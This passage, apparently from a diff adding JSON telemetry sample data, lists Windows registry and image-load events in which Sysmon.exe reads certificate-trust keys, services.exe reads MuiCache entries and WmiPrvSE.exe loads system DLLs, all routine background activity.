2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "regapi.dll", + "image_path": "C:\\Windows\\System32\\regapi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 